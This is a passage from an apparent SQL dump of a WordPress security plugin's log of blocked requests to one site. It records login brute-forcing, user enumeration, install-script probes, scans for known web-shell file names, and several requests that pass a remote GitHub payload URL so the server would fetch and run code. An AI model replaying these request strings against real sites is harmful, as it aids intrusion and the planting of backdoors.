Safari\\/537.36\"}','Yk4KqQvX9nMZsjJP3lW2aSx5',0,1637474006.1873,480,'','POST',403,0,600,0,1,'',0),('62.109.14.119',1047334519,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36 MVisionPlayer\\/1.0.0.0\"}','h5FopTX1Oj3SifyHc9NJtMVq',0,1637474308.6395,478,'','POST',403,0,600,0,1,'',0),('192.236.154.81',3236731473,'','https://ashbooks.co.uk/wp-includes/upload_index.php?auth=f02pz3831W0DTtLgq26L','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/92.0.4515.107 Safari\\/537.36\"}','wVBjroiGz8leApUhDvQR1uS6',0,1637474581.0685,520,'','GET',403,0,700,0,1,'',0),('82.202.172.247',1389014263,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.101 Safari\\/537.36\"}','VoahEIZ3G49K0zLgdpHxO1te',0,1637475368.5548,569,'','POST',403,0,600,0,1,'',0),('35.241.123.16',603028240,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','FCJSi65tvwzgslUxHdDTaZqL',0,1637476900.0568,558,'','POST',403,0,600,0,1,'',0),('173.236.176.10',2917969930,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','04o2QYwBPntACXugVziZelJ8',0,1637477669.8916,476,'','POST',403,0,600,0,1,'',0),('82.223.9.22',1390348566,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','oRzWSB8rDhV1uNkMqilfYpd5',0,1637477792.1472,690,'','GET',403,0,520,0,1,'',0),('91.238.164.176',1542366384,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','G5AgZtY6fVq3n18jdwcShk40',0,1637479384.6496,1014,'','POST',403,0,600,0,1,'',0),('77.240.13.186',1307577786,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','w5H87BAojPcRzxMX2yEUGkgJ',0,1637480139.2130,515,'','POST',403,0,600,0,1,'',0),('91.221.37.58',1541219642,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','R9v7aKhH6m0J5LNIq8jWZXCk',0,1637480876.7256,218,'','POST',403,0,600,0,1,'',0),('65.108.51.66',1097610050,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.193 Safari\\/537.36\"}','0ZxjD2RasmHGJTVLKnqcpN78',0,1637481539.9516,521,'','POST',403,0,600,0,1,'',0),('178.128.247.244',2994796532,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','T5i7hsnPxBle4CwqS61E9HL3',0,1637482256.0173,460,'','POST',403,0,600,0,1,'',0),('34.124.187.110',578599790,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/53.0.2785.143 Safari\\/537.36\"}','caPjNi0Y3kClzs7bpqx5t1wh',0,1637483600.3617,795,'','POST',403,0,600,0,1,'',0),('67.205.61.254',1137524222,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.86 Safari\\/537.36\"}','I0knPW2NQp4tJHdgBxzcSVDa',0,1637484350.3282,501,'','POST',403,0,600,0,1,'',0),('89.238.223.38',1508826918,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','NZbSRUj0weh1MKkdcpmOxtI6',0,1637485092.4212,507,'','POST',403,0,600,0,1,'',0),('45.90.216.111',760928367,'','https://ashbooks.co.uk/lock360.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2916.19 Safari\\/537.36\"}','U4eCypJxicwtAOBGsIk2MXZj',0,1637488170.5166,594,'','GET',403,0,700,0,1,'',0),('69.30.231.154',1159653274,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit\\/534.59.10 (KHTML, like Gecko) Version\\/5.1.9 Safari\\/534.59.10\"}','mSwd9FztVkWgciDZqCyH5LnQ',0,1637496896.0114,431,'','POST',403,0,600,0,1,'',0),('192.3.144.82',3221459026,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945 Safari\\/537.36\"}','6ghiqeUVFlwYsI4SXovrkaCn',0,1637498867.1069,176,'','POST',403,0,600,0,1,'',0),('67.205.61.254',1137524222,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','1slZButiHcjoVGXrLvWb7aFM',0,1637502822.2594,412,'','GET',403,0,520,0,1,'',0),('75.127.5.31',1266615583,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/76.0.3809 Safari\\/537.36\"}','TMKCk1SXsPhw0lgIbJDQraNB',0,1637523256.6667,724,'','POST',403,0,600,0,1,'',0),('159.223.62.33',2682207777,'','https://ashbooks.co.uk/administrator/index.php','','{\"1\":\"python-requests\\/2.26.0\"}','SwtOV8sNJkXo3QRyBfqrhDlx',0,1637523350.1899,432,'','GET',403,0,700,0,1,'',0),('157.245.156.140',2650119308,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Lj8rXPYvRa5s0No64tlfc9E1',0,1637523842.0507,1027,'','GET',403,0,520,0,1,'',0),('107.150.48.238',1805005038,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','SqUpXbeuOMZ4wLD7rIha6lxk',0,1637535051.3264,576,'','POST',403,0,600,0,1,'',0),('182.18.140.37',3054668837,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','6bvS4f3MnZsRY5lJGVW7jPiK',0,1637571727.9418,527,'','GET',403,0,520,0,1,'',0),('45.158.15.146',765333394,'','https://ashbooks.co.uk/wp-content/themes/sketch/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','2urmlThJxNXSAqM3YLOZCgF8',0,1637579042.7229,494,'','GET',403,0,700,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/https://kalamazoo.pl/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','6cxknsuJSOCePE0DILb834WA',0,1637582023.1016,419,'','GET',403,0,700,0,1,'',0),('198.98.48.231',3328323815,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','RG7WH4mtJiyD8aeQuELX2KxI',0,1637592759.6070,517,'','POST',403,0,600,0,1,'',0),('107.150.63.171',1805008811,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','6q4nhHMSiytYvZrUb8jEX01z',0,1637595668.9695,253,'','POST',403,0,600,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/wp/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','lHNCcs0PVe5YEdJOaUf9AwZ8',0,1637596402.5960,437,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/new/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','cZfeB42hd7NJDiux9Yg1MRXC',0,1637596492.3308,438,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/old/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','8cdzshFoGq0XxE9nuRfVYaUI',0,1637596512.0399,404,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/wordpress/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','gzHi9rVtRGNpsfkWejFx3Odm',0,1637596523.5091,828,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/test/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','v1Oqfml9JeTBW0pPu5nKD8CE',0,1637596531.2178,422,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/blog/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','3gF4qQBewsvh5ySolkZaD0Ui',0,1637596536.8640,687,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/cms/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','aURDjztSF1dv46LNHiVghGek',0,1637596543.2922,809,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/web/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','lvjfV3LJSbhGN6iwDB84n2dF',0,1637596551.2198,785,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/backup/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','zVAKZatH8rwR7JLPjfylQIeN',0,1637596560.3383,792,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/site/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','CIh28rDntvaiRO9Am6j1wlbH',0,1637596571.6623,425,'','GET',403,0,700,0,1,'',0),('159.223.62.44',2682207788,'','https://ashbooks.co.uk/oldsite/wp-admin/install.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/39.0.2171.95 Safari\\/537.36\"}','eBl52gHfFZL7PTOdYAVzJQW3',0,1637596577.3035,442,'','GET',403,0,700,0,1,'',0),('84.239.46.7',1424961031,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/12.0 Mobile\\/15E148 Safari\\/604.1\"}','mdu6GneUBjk83ZN4AQ1JIhRO',0,1637606052.4574,869,'','POST',403,0,600,0,1,'',0),('45.158.15.145',765333393,'','https://ashbooks.co.uk/css/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko\\/20100101 Firefox\\/81.0\"}','P4JRG2p3r5XF0v8B9whdqVLi',0,1637607288.1913,438,'','GET',403,0,700,0,1,'',0),('104.131.36.132',1753425028,'','https://ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php?ARRAY=5o3939313633373430323231302p22687474703n5p2s5p2s7777772r73686s7061747n6s652r636s6q5p2s6s70616p656634305p2s7374796p652r637373225q','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','7Js5WzXmqaGnkgU9IL41ivOr',0,1637620239.1687,413,'','GET',403,0,700,0,1,'',0),('104.131.36.132',1753425028,'','https://ashbooks.co.uk/wp-includes/js/tinymce/plugins/lists/lists/index.php?ARRAY=5o3939313633373430323231302p22687474703n5p2s5p2s7777772r73686s7061747n6s652r636s6q5p2s6s70616p656634305p2s7374796p652r637373225q','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/50.0.2661.75 Safari\\/537.36\",\"2\":\"ashbooks.co.uk\"}','nZLJt5qflCphXuG9USI7bMv6',0,1637620296.1187,400,'','GET',403,0,700,0,1,'',0),('107.189.5.5',1807549701,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','vyQXkSA6tnLhKoUgxGdJb0TV',0,1637625850.9218,417,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','u2P980cVZ3jxhGw7ieH6sUkF',0,1637637061.4117,556,'','POST',403,0,600,0,1,'',0),('159.223.50.44',2682204716,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','K36Fe0A4BczkOTvVbStmNdZQ',0,1637639795.9552,267,'','GET',403,0,520,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','3nQKdk7OiUFTAcV0wXsf4Nzt',0,1637642308.9821,166,'','POST',403,0,600,0,1,'',0),('107.150.57.35',1805007139,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko\\/20100101 Firefox\\/31.0\"}','aLwi5EUNmQ367FoqA0ZHsbTD',0,1637648978.1684,482,'','POST',403,0,600,0,1,'',0),('185.191.34.215',3116311255,'','https://ashbooks.co.uk/assets/images/accesson.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','GROYzVT2awe6HL5npCSs1W9q',0,1637649417.3112,533,'','GET',403,0,700,0,1,'',0),('82.208.189.233',1389411817,'','https://ashbooks.co.uk/xmrlpc.php?daksldlkdsadas=1','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:46.0) Gecko\\/20100101 Firefox\\/46.0\"}','scR5jDyWb4nkZOgvEuHC0rh3',0,1637651180.9049,471,'','GET',403,0,700,0,1,'',0),('69.30.240.26',1159655450,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','URbwohANy63gd2GPIevsDnLu',0,1637653981.4171,411,'','POST',403,0,600,0,1,'',0),('69.30.225.182',1159651766,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit\\/537.75.14 (KHTML, like Gecko) Version\\/7.0.3 Safari\\/537.75.14\"}','Qdm2RWEXkIPZxKgyStfLwMY0',0,1637654560.3575,686,'','POST',403,0,600,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/style.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','pVvNsqWLDa6YgJ2Gu8ko0F7U',0,1637655591.6398,202,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/moduless.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','PjHdQMAlsFmtIpW6e42zXDBC',0,1637655603.2193,428,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php?test=hello','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','lAxcB1OgjMZ6n87DKV0PEoCa',0,1637655605.5963,161,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/admin.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','EWve4owmV7U9y2QJHZAiBfa1',0,1637655607.3780,411,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/boom.php?x','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','hZli0DgoSOx6zBJFHr5ysUjG',0,1637655614.5482,347,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/backup_index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','9FQ4J6bDGAfxhrzmk71MjCaZ',0,1637655616.4097,417,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/db_cache.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','4Dzop7Z9JGriFPxdh8yg10AT',0,1637655618.4131,435,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','t8YzTbAMp7io4wqh3dZ06KnO',0,1637655620.6658,403,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','ofauWLGdIb6O9XxTiJtznFVR',0,1637655625.3039,396,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','j8W6Cy1HfDg3TXNxzhJIpQbU',0,1637655627.4945,126,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','RIDVCNPWypae36qQYlib7MzL',0,1637655629.2649,585,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','sHMaDkYlVB5xWScu1f9NXPyG',0,1637655631.5351,364,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/alfa.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','42YFZvsMUN0zCVkJfbQ3OWe8',0,1637655643.7880,386,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-booking.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','6ZYxrUsX5bujIDlniePc4KSq',0,1637655646.6646,601,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/cindex.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','A9s38FriJgIzEDCGNPfjRacy',0,1637655648.8640,642,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','gYxEasjJV4SUk7HKA98PtqhT',0,1637655651.2070,413,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-1ogin_bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qbVyTsJtvGzHnPp3i169M5Yj',0,1637655653.5403,409,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/fonts/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5wFoGBJHUASpKdZxXuDCI7Ta',0,1637655655.7140,384,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/css/css.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','5KOqt7LwX4AzIikxo9CMrDYT',0,1637655657.8053,392,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/old-index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','CfYsFoJat2M6dmHUAqrQSgzL',0,1637655660.3332,411,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','D5grvR9SUlo37swKIxkeE1fA',0,1637655662.4719,407,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-admin/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','g7RJ4yUhnTeQFwvONKsBW9ck',0,1637655664.4554,441,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','qruVsE9QjHZa8pLUOf7YczwT',0,1637655666.4792,412,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-includes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 Safari\\/537.36\",\"2\":\"anonymousfox.co\"}','IoJ5h7U6lrLt1gKWvnfeAMD2',0,1637655668.3410,381,'','GET',403,0,700,0,1,'',0),('40.69.131.238',675644398,'','https://ashbooks.co.uk/wp-content/themes/config.bak.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.85 